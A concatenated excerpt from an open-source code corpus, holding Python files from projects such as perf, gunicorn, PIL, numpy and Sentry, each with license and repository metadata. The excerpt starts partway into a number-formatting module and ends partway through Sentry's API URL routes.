"""Format x as [-]ddd.ddd with 'digs' digits after the point
and at least one digit before.
If digs <= 0, the point is suppressed."""
if type(x) != type(''): x = repr(x)
try:
sign, intpart, fraction, expo = extract(x)
except NotANumber:
return x
intpart, fraction = unexpo(intpart, fraction, expo)
intpart, fraction = roundfrac(intpart, fraction, digs)
while intpart and intpart[0] == '0': intpart = intpart[1:]
if intpart == '': intpart = '0'
if digs > 0: return sign + intpart + '.' + fraction
else: return sign + intpart
def sci(x, digs):
"""Format x as [-]d.dddE[+-]ddd with 'digs' digits after the point
and exactly one digit before.
If digs is <= 0, one digit is kept and the point is suppressed."""
if type(x) != type(''): x = repr(x)
sign, intpart, fraction, expo = extract(x)
if not intpart:
while fraction and fraction[0] == '0':
fraction = fraction[1:]
expo = expo - 1
if fraction:
intpart, fraction = fraction[0], fraction[1:]
expo = expo - 1
else:
intpart = '0'
else:
expo = expo + len(intpart) - 1
intpart, fraction = intpart[0], intpart[1:] + fraction
digs = max(0, digs)
intpart, fraction = roundfrac(intpart, fraction, digs)
if len(intpart) > 1:
intpart, fraction, expo = \
intpart[0], intpart[1:] + fraction[:-1], \
expo + len(intpart) - 1
s = sign + intpart
if digs > 0: s = s + '.' + fraction
e = repr(abs(expo))
e = '0'*(3-len(e)) + e
if expo < 0: e = '-' + e
else: e = '+' + e
return s + 'e' + e
def test():
"""Interactive test run."""
try:
while 1:
x, digs = input('Enter (x, digs): ')
print x, fix(x, digs), sci(x, digs)
except (EOFError, KeyboardInterrupt):
pass
| gpl-2.0 |
tekkamanninja/linux-beagleboard | tools/perf/scripts/python/syscall-counts.py | 11181 | 1522 | # system call counts
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
gilestrolab/pyrem | src/pyrem/io.py | 1 | 3060 | from pyrem.polygram import Polygram
__author__ = 'quentin'
#todo edf, csv
import scipy.io as scio
import pandas as pd
import numpy as np
from pyrem.time_series import Signal, Annotation
import joblib
from pyrem.time_series import BiologicalTimeSeries, Annotation, Signal
def polygram_from_pkl(filename):
return joblib.load(filename)
def signal_from_pkl(filename):
return joblib.load(filename)
#
# def signal_from_csv(file_name, sampling_freq):
# data = pd.read_csv(file_name, engine="c", header=None, dtype=np.float32)
# return Signal(data, sampling_freq)
def _annotation_from_spike_txt(filename, doubt_chars):
"""
Hacky parser needed because spike does not export epochs of exactly 5.000 s!!!!!!!
:param filename:
:return:
"""
df = pd.read_csv(filename, skiprows=16, sep="\t", names=["t", "x1", "x2", "x3","x4", "x5","y"], header=None, na_values="nan")
ts = df["y"]
ts.index = pd.to_datetime(df["t"] * 1e9)
annotations = ts.dropna()
annotations = annotations.resample("5s", how="first")
annotations = annotations.fillna(method="ffill")
np_ord = np.vectorize(lambda x : ord(x.upper()))
annot_values = np_ord(np.array(annotations)).flatten()
annot_values = annot_values.astype(np.uint8)
annot_probas = [0 if a in doubt_chars else 1 for a in annot_values]
return Annotation(annot_values, 1/5.0, annot_probas, name="vigilance_state", type="vigilance_state")
def polygram_from_spike_matlab_file(signal_filename, annotation_filename, fs, annotation_fs, channel_names, channel_types, doubt_chars,resample_signals, metadata={}):
"""
This function loads a matlab file exported by spike to
as a polygraph.
:param signal_filename: the matlab file name
:return: a polygram
"""
an = _annotation_from_spike_txt(annotation_filename, doubt_chars)
type_for_name = dict(zip(channel_names, channel_types))
matl = scio.loadmat(signal_filename, squeeze_me=True, struct_as_record=False)
data_channels = {}
# annotation_channels = {}
for k in matl.keys():
# exclude metadata such as "__global__", "__version__" ...
if not k.startswith("__"):
obj = matl[k]
channel_number = int(k.split("_")[-1][2:])
if "values" in dir(obj):
channel_id = channel_names[channel_number-1]
data_channels[channel_id] = obj.values
elif "text" in dir(obj):
pass
# annotation_channels["Stage_%i" % (channel_number-1)] = obj.text
del matl
crop_at = np.min([i.size for _,i in data_channels.items()])
for k,a in data_channels.items():
data_channels[k] = a[:crop_at]
signals = [Signal(data,fs, name=name, type=type_for_name[name] ) for name,data in data_channels.items()]
del data_channels
if resample_signals:
signals = [ s.resample(resample_signals) for s in signals]
#signals = [s[:an.duration]for s in signals]
signals.append(an)
return Polygram(signals)
| gpl-3.0 |
Hoekz/hackness-monster | venv/lib/python2.7/site-packages/gunicorn/management/commands/run_gunicorn.py | 23 | 3638 | # -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
from optparse import make_option
import sys
from django.core.management.base import BaseCommand, CommandError
from gunicorn.app.djangoapp import DjangoApplicationCommand
from gunicorn.config import make_settings
from gunicorn import util
# monkey patch django.
# This patch make sure that we use real threads to get the ident which
# is going to happen if we are using gevent or eventlet.
try:
from django.db.backends import BaseDatabaseWrapper, DatabaseError
if "validate_thread_sharing" in BaseDatabaseWrapper.__dict__:
import thread
_get_ident = thread.get_ident
__old__init__ = BaseDatabaseWrapper.__init__
def _init(self, *args, **kwargs):
__old__init__(self, *args, **kwargs)
self._thread_ident = _get_ident()
def _validate_thread_sharing(self):
if (not self.allow_thread_sharing
and self._thread_ident != _get_ident()):
raise DatabaseError("DatabaseWrapper objects created in a "
"thread can only be used in that same thread. The object "
"with alias '%s' was created in thread id %s and this is "
"thread id %s."
% (self.alias, self._thread_ident, _get_ident()))
BaseDatabaseWrapper.__init__ = _init
BaseDatabaseWrapper.validate_thread_sharing = _validate_thread_sharing
except ImportError:
pass
def make_options():
opts = [
make_option('--adminmedia', dest='admin_media_path', default='',
help='Specifies the directory from which to serve admin media.')
]
g_settings = make_settings(ignore=("version"))
keys = g_settings.keys()
for k in keys:
if k in ('pythonpath', 'django_settings',):
continue
setting = g_settings[k]
if not setting.cli:
continue
args = tuple(setting.cli)
kwargs = {
"dest": setting.name,
"metavar": setting.meta or None,
"action": setting.action or "store",
"type": setting.type or "string",
"default": None,
"help": "%s [%s]" % (setting.short, setting.default)
}
if kwargs["action"] != "store":
kwargs.pop("type")
opts.append(make_option(*args, **kwargs))
return tuple(opts)
GUNICORN_OPTIONS = make_options()
class Command(BaseCommand):
option_list = BaseCommand.option_list + GUNICORN_OPTIONS
help = "Starts a fully-functional Web server using gunicorn."
args = '[optional port number, or ipaddr:port or unix:/path/to/sockfile]'
# Validation is called explicitly each time the server is reloaded.
requires_model_validation = False
def handle(self, addrport=None, *args, **options):
# deprecation warning to announce future deletion in R21
util.warn("""This command is deprecated.
You should now run your application with the WSGI interface
installed with your project. Ex.:
gunicorn myproject.wsgi:application
See https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/gunicorn/
for more info.""")
if args:
raise CommandError('Usage is run_gunicorn %s' % self.args)
if addrport:
sys.argv = sys.argv[:-1]
options['bind'] = addrport
admin_media_path = options.pop('admin_media_path', '')
DjangoApplicationCommand(options, admin_media_path).run()
| mit |
tenvick/hugular_cstolua | Client/tools/site-packages/PIL/WalImageFile.py | 14 | 5445 | #
# The Python Imaging Library.
# $Id: WalImageFile.py 2134 2004-10-06 08:55:20Z fredrik $
#
# WAL file handling
#
# History:
# 2003-04-23 fl created
#
# Copyright (c) 2003 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
# NOTE: This format cannot be automatically recognized, so the reader
# is not registered for use with Image.open(). To open a WEL file, use
# the WalImageFile.open() function instead.
# This reader is based on the specification available from:
# http://www.flipcode.com/tutorials/tut_q2levels.shtml
# and has been tested with a few sample files found using google.
import Image
def i32(c, o=0):
return ord(c[o])+(ord(c[o+1])<<8)+(ord(c[o+2])<<16)+(ord(c[o+3])<<24)
##
# Load texture from a Quake2 WAL texture file.
# <p>
# By default, a Quake2 standard palette is attached to the texture.
# To override the palette, use the <b>putpalette</b> method.
#
# @param filename WAL file name, or an opened file handle.
# @return An image instance.
def open(filename):
# FIXME: modify to return a WalImageFile instance instead of
# plain Image object ?
if hasattr(filename, "read"):
fp = filename
else:
import __builtin__
fp = __builtin__.open(filename, "rb")
# read header fields
header = fp.read(32+24+32+12)
size = i32(header, 32), i32(header, 36)
offset = i32(header, 40)
# load pixel data
fp.seek(offset)
im = Image.fromstring("P", size, fp.read(size[0] * size[1]))
im.putpalette(quake2palette)
im.format = "WAL"
im.format_description = "Quake2 Texture"
# strings are null-terminated
im.info["name"] = header[:32].split("\0", 1)[0]
next_name = header[56:56+32].split("\0", 1)[0]
if next_name:
im.info["next_name"] = next_name
return im
quake2palette = (
# default palette taken from piffo 0.93 by Hans Häggström
"\x01\x01\x01\x0b\x0b\x0b\x12\x12\x12\x17\x17\x17\x1b\x1b\x1b\x1e"
"\x1e\x1e\x22\x22\x22\x26\x26\x26\x29\x29\x29\x2c\x2c\x2c\x2f\x2f"
"\x2f\x32\x32\x32\x35\x35\x35\x37\x37\x37\x3a\x3a\x3a\x3c\x3c\x3c"
"\x24\x1e\x13\x22\x1c\x12\x20\x1b\x12\x1f\x1a\x10\x1d\x19\x10\x1b"
"\x17\x0f\x1a\x16\x0f\x18\x14\x0d\x17\x13\x0d\x16\x12\x0d\x14\x10"
"\x0b\x13\x0f\x0b\x10\x0d\x0a\x0f\x0b\x0a\x0d\x0b\x07\x0b\x0a\x07"
"\x23\x23\x26\x22\x22\x25\x22\x20\x23\x21\x1f\x22\x20\x1e\x20\x1f"
"\x1d\x1e\x1d\x1b\x1c\x1b\x1a\x1a\x1a\x19\x19\x18\x17\x17\x17\x16"
"\x16\x14\x14\x14\x13\x13\x13\x10\x10\x10\x0f\x0f\x0f\x0d\x0d\x0d"
"\x2d\x28\x20\x29\x24\x1c\x27\x22\x1a\x25\x1f\x17\x38\x2e\x1e\x31"
"\x29\x1a\x2c\x25\x17\x26\x20\x14\x3c\x30\x14\x37\x2c\x13\x33\x28"
"\x12\x2d\x24\x10\x28\x1f\x0f\x22\x1a\x0b\x1b\x14\x0a\x13\x0f\x07"
"\x31\x1a\x16\x30\x17\x13\x2e\x16\x10\x2c\x14\x0d\x2a\x12\x0b\x27"
"\x0f\x0a\x25\x0f\x07\x21\x0d\x01\x1e\x0b\x01\x1c\x0b\x01\x1a\x0b"
"\x01\x18\x0a\x01\x16\x0a\x01\x13\x0a\x01\x10\x07\x01\x0d\x07\x01"
"\x29\x23\x1e\x27\x21\x1c\x26\x20\x1b\x25\x1f\x1a\x23\x1d\x19\x21"
"\x1c\x18\x20\x1b\x17\x1e\x19\x16\x1c\x18\x14\x1b\x17\x13\x19\x14"
"\x10\x17\x13\x0f\x14\x10\x0d\x12\x0f\x0b\x0f\x0b\x0a\x0b\x0a\x07"
"\x26\x1a\x0f\x23\x19\x0f\x20\x17\x0f\x1c\x16\x0f\x19\x13\x0d\x14"
"\x10\x0b\x10\x0d\x0a\x0b\x0a\x07\x33\x22\x1f\x35\x29\x26\x37\x2f"
"\x2d\x39\x35\x34\x37\x39\x3a\x33\x37\x39\x30\x34\x36\x2b\x31\x34"
"\x27\x2e\x31\x22\x2b\x2f\x1d\x28\x2c\x17\x25\x2a\x0f\x20\x26\x0d"
"\x1e\x25\x0b\x1c\x22\x0a\x1b\x20\x07\x19\x1e\x07\x17\x1b\x07\x14"
"\x18\x01\x12\x16\x01\x0f\x12\x01\x0b\x0d\x01\x07\x0a\x01\x01\x01"
"\x2c\x21\x21\x2a\x1f\x1f\x29\x1d\x1d\x27\x1c\x1c\x26\x1a\x1a\x24"
"\x18\x18\x22\x17\x17\x21\x16\x16\x1e\x13\x13\x1b\x12\x12\x18\x10"
"\x10\x16\x0d\x0d\x12\x0b\x0b\x0d\x0a\x0a\x0a\x07\x07\x01\x01\x01"
"\x2e\x30\x29\x2d\x2e\x27\x2b\x2c\x26\x2a\x2a\x24\x28\x29\x23\x27"
"\x27\x21\x26\x26\x1f\x24\x24\x1d\x22\x22\x1c\x1f\x1f\x1a\x1c\x1c"
"\x18\x19\x19\x16\x17\x17\x13\x13\x13\x10\x0f\x0f\x0d\x0b\x0b\x0a"
"\x30\x1e\x1b\x2d\x1c\x19\x2c\x1a\x17\x2a\x19\x14\x28\x17\x13\x26"
"\x16\x10\x24\x13\x0f\x21\x12\x0d\x1f\x10\x0b\x1c\x0f\x0a\x19\x0d"
"\x0a\x16\x0b\x07\x12\x0a\x07\x0f\x07\x01\x0a\x01\x01\x01\x01\x01"
"\x28\x29\x38\x26\x27\x36\x25\x26\x34\x24\x24\x31\x22\x22\x2f\x20"
"\x21\x2d\x1e\x1f\x2a\x1d\x1d\x27\x1b\x1b\x25\x19\x19\x21\x17\x17"
"\x1e\x14\x14\x1b\x13\x12\x17\x10\x0f\x13\x0d\x0b\x0f\x0a\x07\x07"
"\x2f\x32\x29\x2d\x30\x26\x2b\x2e\x24\x29\x2c\x21\x27\x2a\x1e\x25"
"\x28\x1c\x23\x26\x1a\x21\x25\x18\x1e\x22\x14\x1b\x1f\x10\x19\x1c"
"\x0d\x17\x1a\x0a\x13\x17\x07\x10\x13\x01\x0d\x0f\x01\x0a\x0b\x01"
"\x01\x3f\x01\x13\x3c\x0b\x1b\x39\x10\x20\x35\x14\x23\x31\x17\x23"
"\x2d\x18\x23\x29\x18\x3f\x3f\x3f\x3f\x3f\x39\x3f\x3f\x31\x3f\x3f"
"\x2a\x3f\x3f\x20\x3f\x3f\x14\x3f\x3c\x12\x3f\x39\x0f\x3f\x35\x0b"
"\x3f\x32\x07\x3f\x2d\x01\x3d\x2a\x01\x3b\x26\x01\x39\x21\x01\x37"
"\x1d\x01\x34\x1a\x01\x32\x16\x01\x2f\x12\x01\x2d\x0f\x01\x2a\x0b"
"\x01\x27\x07\x01\x23\x01\x01\x1d\x01\x01\x17\x01\x01\x10\x01\x01"
"\x3d\x01\x01\x19\x19\x3f\x3f\x01\x01\x01\x01\x3f\x16\x16\x13\x10"
"\x10\x0f\x0d\x0d\x0b\x3c\x2e\x2a\x36\x27\x20\x30\x21\x18\x29\x1b"
"\x10\x3c\x39\x37\x37\x32\x2f\x31\x2c\x28\x2b\x26\x21\x30\x22\x20"
)
if __name__ == "__main__":
im = open("../hacks/sample.wal")
print im.info, im.mode, im.size
im.save("../out.png")
| mit |
southpawtech/TACTIC-DEV | src/context/client/common.py | 6 | 3673 | ###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ['TacticException', 'TacticInfo']
import cStringIO, os, sys, urllib, xmlrpclib, re, string
from xml.dom.minidom import parseString
from pyasm.application.common import BaseAppInfo
class TacticException(Exception):
pass
class TacticInfo(BaseAppInfo):
'''Holds data in application session that is fed by the tactic server.
For this implementation, the information is retrieved by get
variables from application. This information is generally fed into
the environment class'''
def get_ticket(my):
return my.app.get_var("tactic_ticket")
def get_tactic_server(my):
tactic_server = my.app.get_var("tactic_server")
return tactic_server
def get_xmlrpc_server(my):
xmlrpc_url = my.app.get_var("tactic_xmlrpc")
# Applications can't take https
#xmlrpc_url = xmlrpc_url.replace('https:', 'http:')
# can't check for None here because this fires and __eq__ function
# to the server
if not isinstance(my.xmlrpc_server, xmlrpclib.Server):
my.xmlrpc_server = xmlrpclib.Server(xmlrpc_url, allow_none=True)
# WARNING: this is changing code in the xmlrpclib library. This
# library is not sending a proper user agent. Hacking it in
# that it is a little better
if os.name == "nt":
user_agent = 'xmlrpclib.py (Windows)'
else:
user_agent = 'xmlrpclib.py (Linux)'
xmlrpclib.Transport.user_agent = user_agent
# this will be removed. as project_code should be set per call.
project_code = my.get_project_code()
if project_code:
my.xmlrpc_server.set_project(project_code)
return my.xmlrpc_server
def get_upload_server(my):
upload_url = my.app.get_var("tactic_upload")
return upload_url
def get_user(my):
user = my.app.get_var("tactic_user")
return user
def get_tmpdir(my):
tmpdir = my.app.get_var("tactic_tmpdir")
return tmpdir
def get_sandbox_dir(my):
sandbox_dir = my.app.get_var("tactic_sandbox_dir")
return sandbox_dir
def get_project_code(my):
project_code = my.app.get_var("tactic_project_code")
return project_code
def get_server(my):
base_url = my.app.get_var("tactic_base_url")
base_url = re.sub('http://|https://', '', base_url)
return base_url
# general common functions
def upload_warning():
info = TacticInfo.get()
info.report_warning('','', upload=True)
#remove the file afterwards
path = "%s/warning.txt" % info.get_tmpdir()
if os.path.exists(path):
os.unlink(path)
def explore(dir):
'''create path and open explorer'''
if not os.path.exists(dir):
os.makedirs(dir)
if os.name=='nt':
program = 'explorer'
for path in string.split(os.environ["PATH"], os.pathsep):
file = os.path.join(path, program) + ".exe"
try:
return os.spawnv(os.P_WAIT, file, (file,) + tuple(['file://%s' %dir]))
except os.error:
pass
raise os.error, "cannot find executable"
else: # mac OSX
program = '/usr/bin/open'
os.system('%s %s' %(program, dir))
| epl-1.0 |
ettm2012/MissionPlanner | Lib/site-packages/numpy/tests/test_ctypeslib.py | 53 | 4165 | import sys
import exceptions
import numpy as np
from numpy.ctypeslib import ndpointer, load_library
from numpy.testing import *
try:
cdll = load_library('multiarray', np.core.multiarray.__file__)
_HAS_CTYPE = True
except ImportError:
_HAS_CTYPE = False
except exceptions.OSError, e:
_HAS_CTYPE = False
class TestLoadLibrary(TestCase):
@dec.skipif(not _HAS_CTYPE, "ctypes not available on this python installation")
@dec.knownfailureif(sys.platform=='cygwin', "This test is known to fail on cygwin")
def test_basic(self):
try:
cdll = load_library('multiarray',
np.core.multiarray.__file__)
except ImportError, e:
msg = "ctypes is not available on this python: skipping the test" \
" (import error was: %s)" % str(e)
print msg
@dec.skipif(not _HAS_CTYPE, "ctypes not available on this python installation")
@dec.knownfailureif(sys.platform=='cygwin', "This test is known to fail on cygwin")
def test_basic2(self):
"""Regression for #801: load_library with a full library name
(including extension) does not work."""
try:
try:
from distutils import sysconfig
so = sysconfig.get_config_var('SO')
cdll = load_library('multiarray%s' % so,
np.core.multiarray.__file__)
except ImportError:
print "No distutils available, skipping test."
except ImportError, e:
msg = "ctypes is not available on this python: skipping the test" \
" (import error was: %s)" % str(e)
print msg
class TestNdpointer(TestCase):
def test_dtype(self):
dt = np.intc
p = ndpointer(dtype=dt)
self.assert_(p.from_param(np.array([1], dt)))
dt = '<i4'
p = ndpointer(dtype=dt)
self.assert_(p.from_param(np.array([1], dt)))
dt = np.dtype('>i4')
p = ndpointer(dtype=dt)
p.from_param(np.array([1], dt))
self.assertRaises(TypeError, p.from_param,
np.array([1], dt.newbyteorder('swap')))
dtnames = ['x', 'y']
dtformats = [np.intc, np.float64]
dtdescr = {'names' : dtnames, 'formats' : dtformats}
dt = np.dtype(dtdescr)
p = ndpointer(dtype=dt)
self.assert_(p.from_param(np.zeros((10,), dt)))
samedt = np.dtype(dtdescr)
p = ndpointer(dtype=samedt)
self.assert_(p.from_param(np.zeros((10,), dt)))
dt2 = np.dtype(dtdescr, align=True)
if dt.itemsize != dt2.itemsize:
self.assertRaises(TypeError, p.from_param, np.zeros((10,), dt2))
else:
self.assert_(p.from_param(np.zeros((10,), dt2)))
def test_ndim(self):
p = ndpointer(ndim=0)
self.assert_(p.from_param(np.array(1)))
self.assertRaises(TypeError, p.from_param, np.array([1]))
p = ndpointer(ndim=1)
self.assertRaises(TypeError, p.from_param, np.array(1))
self.assert_(p.from_param(np.array([1])))
p = ndpointer(ndim=2)
self.assert_(p.from_param(np.array([[1]])))
def test_shape(self):
p = ndpointer(shape=(1,2))
self.assert_(p.from_param(np.array([[1,2]])))
self.assertRaises(TypeError, p.from_param, np.array([[1],[2]]))
p = ndpointer(shape=())
self.assert_(p.from_param(np.array(1)))
def test_flags(self):
x = np.array([[1,2,3]], order='F')
p = ndpointer(flags='FORTRAN')
self.assert_(p.from_param(x))
p = ndpointer(flags='CONTIGUOUS')
self.assertRaises(TypeError, p.from_param, x)
p = ndpointer(flags=x.flags.num)
self.assert_(p.from_param(x))
self.assertRaises(TypeError, p.from_param, np.array([[1,2,3]]))
if hasattr(sys, 'gettotalrefcount'):
# skip this test class when Python was compiled using
# the --with-pydebug option. This is necessary because, i.e.
# type("foo", (object,), {})
# leaks references
del TestNdpointer
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 |
llonchj/sentry | src/sentry/api/urls.py | 2 | 10295 | from __future__ import absolute_import, print_function
from django.conf.urls import patterns, url
from .endpoints.auth_index import AuthIndexEndpoint
from .endpoints.broadcast_index import BroadcastIndexEndpoint
from .endpoints.catchall import CatchallEndpoint
from .endpoints.event_details import EventDetailsEndpoint
from .endpoints.group_details import GroupDetailsEndpoint
from .endpoints.group_events import GroupEventsEndpoint
from .endpoints.group_events_latest import GroupEventsLatestEndpoint
from .endpoints.group_notes import GroupNotesEndpoint
from .endpoints.group_stats import GroupStatsEndpoint
from .endpoints.group_tags import GroupTagsEndpoint
from .endpoints.group_tagkey_details import GroupTagKeyDetailsEndpoint
from .endpoints.group_tagkey_values import GroupTagKeyValuesEndpoint
from .endpoints.helppage_details import HelpPageDetailsEndpoint
from .endpoints.helppage_index import HelpPageIndexEndpoint
from .endpoints.index import IndexEndpoint
from .endpoints.internal_stats import InternalStatsEndpoint
from .endpoints.legacy_project_redirect import LegacyProjectRedirectEndpoint
from .endpoints.organization_access_request_details import OrganizationAccessRequestDetailsEndpoint
from .endpoints.organization_details import OrganizationDetailsEndpoint
from .endpoints.organization_member_details import OrganizationMemberDetailsEndpoint
from .endpoints.organization_member_index import OrganizationMemberIndexEndpoint
from .endpoints.organization_member_team_details import OrganizationMemberTeamDetailsEndpoint
from .endpoints.organization_index import OrganizationIndexEndpoint
from .endpoints.organization_projects import OrganizationProjectsEndpoint
from .endpoints.organization_stats import OrganizationStatsEndpoint
from .endpoints.organization_teams import OrganizationTeamsEndpoint
from .endpoints.project_details import ProjectDetailsEndpoint
from .endpoints.project_group_index import ProjectGroupIndexEndpoint
from .endpoints.project_keys import ProjectKeysEndpoint
from .endpoints.project_key_details import ProjectKeyDetailsEndpoint
from .endpoints.project_member_index import ProjectMemberIndexEndpoint
from .endpoints.project_releases import ProjectReleasesEndpoint
from .endpoints.project_stats import ProjectStatsEndpoint
from .endpoints.project_tagkey_details import ProjectTagKeyDetailsEndpoint
from .endpoints.project_tagkey_values import ProjectTagKeyValuesEndpoint
from .endpoints.release_details import ReleaseDetailsEndpoint
from .endpoints.release_files import ReleaseFilesEndpoint
from .endpoints.release_file_details import ReleaseFileDetailsEndpoint
from .endpoints.team_details import TeamDetailsEndpoint
from .endpoints.team_groups_new import TeamGroupsNewEndpoint
from .endpoints.team_groups_trending import TeamGroupsTrendingEndpoint
from .endpoints.team_project_index import TeamProjectIndexEndpoint
from .endpoints.team_stats import TeamStatsEndpoint
from .endpoints.user_details import UserDetailsEndpoint
urlpatterns = patterns(
'',
# Auth
url(r'^auth/$',
AuthIndexEndpoint.as_view(),
name='sentry-api-0-auth'),
# Broadcasts
url(r'^broadcasts/$',
BroadcastIndexEndpoint.as_view(),
name='sentry-api-0-broadcast-index'),
# Users
url(r'^users/(?P<user_id>[^\/]+)/$',
UserDetailsEndpoint.as_view(),
name='sentry-api-0-user-details'),
# Organizations
url(r'^organizations/$',
OrganizationIndexEndpoint.as_view(),
name='sentry-api-0-organizations'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/$',
OrganizationDetailsEndpoint.as_view(),
name='sentry-api-0-organization-details'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/access-requests/(?P<request_id>\d+)/$',
OrganizationAccessRequestDetailsEndpoint.as_view(),
name='sentry-api-0-organization-access-request-details'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/members/$',
OrganizationMemberIndexEndpoint.as_view(),
name='sentry-api-0-organization-member-index'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/members/(?P<member_id>[^\/]+)/$',
OrganizationMemberDetailsEndpoint.as_view(),
name='sentry-api-0-organization-member-details'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/members/(?P<member_id>[^\/]+)/teams/(?P<team_slug>[^\/]+)/$',
OrganizationMemberTeamDetailsEndpoint.as_view(),
name='sentry-api-0-organization-member-team-details'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/projects/$',
OrganizationProjectsEndpoint.as_view(),
name='sentry-api-0-organization-projects'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/stats/$',
OrganizationStatsEndpoint.as_view(),
name='sentry-api-0-organization-stats'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/teams/$',
OrganizationTeamsEndpoint.as_view(),
name='sentry-api-0-organization-teams'),
# Teams
url(r'^teams/(?P<organization_slug>[^\/]+)/(?P<team_slug>[^\/]+)/$',
TeamDetailsEndpoint.as_view(),
name='sentry-api-0-team-details'),
url(r'^teams/(?P<organization_slug>[^\/]+)/(?P<team_slug>[^\/]+)/groups/new/$',
TeamGroupsNewEndpoint.as_view(),
name='sentry-api-0-team-groups-new'),
url(r'^teams/(?P<organization_slug>[^\/]+)/(?P<team_slug>[^\/]+)/groups/trending/$',
TeamGroupsTrendingEndpoint.as_view(),
name='sentry-api-0-team-groups-trending'),
url(r'^teams/(?P<organization_slug>[^\/]+)/(?P<team_slug>[^\/]+)/projects/$',
TeamProjectIndexEndpoint.as_view(),
name='sentry-api-0-team-project-index'),
url(r'^teams/(?P<organization_slug>[^\/]+)/(?P<team_slug>[^\/]+)/stats/$',
TeamStatsEndpoint.as_view(),
name='sentry-api-0-team-stats'),
# Handles redirecting project_id => org_slug/project_slug
# TODO(dcramer): remove this after a reasonable period of time
url(r'^projects/(?P<project_id>\d+)/(?P<path>(?:groups|releases|stats|tags)/.+)?',
LegacyProjectRedirectEndpoint.as_view()),
# Projects
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/$',
ProjectDetailsEndpoint.as_view(),
name='sentry-api-0-project-details'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/groups/$',
ProjectGroupIndexEndpoint.as_view(),
name='sentry-api-0-project-group-index'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/keys/$',
ProjectKeysEndpoint.as_view(),
name='sentry-api-0-project-keys'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/keys/(?P<key_id>[^\/]+)/$',
ProjectKeyDetailsEndpoint.as_view(),
name='sentry-api-0-project-key-details'),
url(r'^projects/(?P<organization_slug>[^/]+)/(?P<project_slug>[^/]+)/members/$',
ProjectMemberIndexEndpoint.as_view(),
name='sentry-api-0-project-member-index'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/releases/$',
ProjectReleasesEndpoint.as_view(),
name='sentry-api-0-project-releases'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/releases/(?P<version>[^/]+)/$',
ReleaseDetailsEndpoint.as_view(),
name='sentry-api-0-release-details'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/releases/(?P<version>[^/]+)/files/$',
ReleaseFilesEndpoint.as_view(),
name='sentry-api-0-release-files'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/releases/(?P<version>[^/]+)/files/(?P<file_id>\d+)/$',
ReleaseFileDetailsEndpoint.as_view(),
name='sentry-api-0-release-file-details'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/stats/$',
ProjectStatsEndpoint.as_view(),
name='sentry-api-0-project-stats'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/tags/(?P<key>[^/]+)/$',
ProjectTagKeyDetailsEndpoint.as_view(),
name='sentry-api-0-project-tagkey-details'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/tags/(?P<key>[^/]+)/values/$',
ProjectTagKeyValuesEndpoint.as_view(),
name='sentry-api-0-project-tagkey-values'),
# Groups
url(r'^groups/(?P<group_id>\d+)/$',
GroupDetailsEndpoint.as_view(),
name='sentry-api-0-group-details'),
url(r'^groups/(?P<group_id>\d+)/events/$',
GroupEventsEndpoint.as_view(),
name='sentry-api-0-group-events'),
url(r'^groups/(?P<group_id>\d+)/events/latest/$',
GroupEventsLatestEndpoint.as_view(),
name='sentry-api-0-group-events-latest'),
url(r'^groups/(?P<group_id>\d+)/notes/$',
GroupNotesEndpoint.as_view(),
name='sentry-api-0-group-notes'),
url(r'^groups/(?P<group_id>\d+)/stats/$',
GroupStatsEndpoint.as_view(),
name='sentry-api-0-group-stats'),
url(r'^groups/(?P<group_id>\d+)/tags/$',
GroupTagsEndpoint.as_view(),
name='sentry-api-0-group-tags'),
url(r'^groups/(?P<group_id>\d+)/tags/(?P<key>[^/]+)/$',
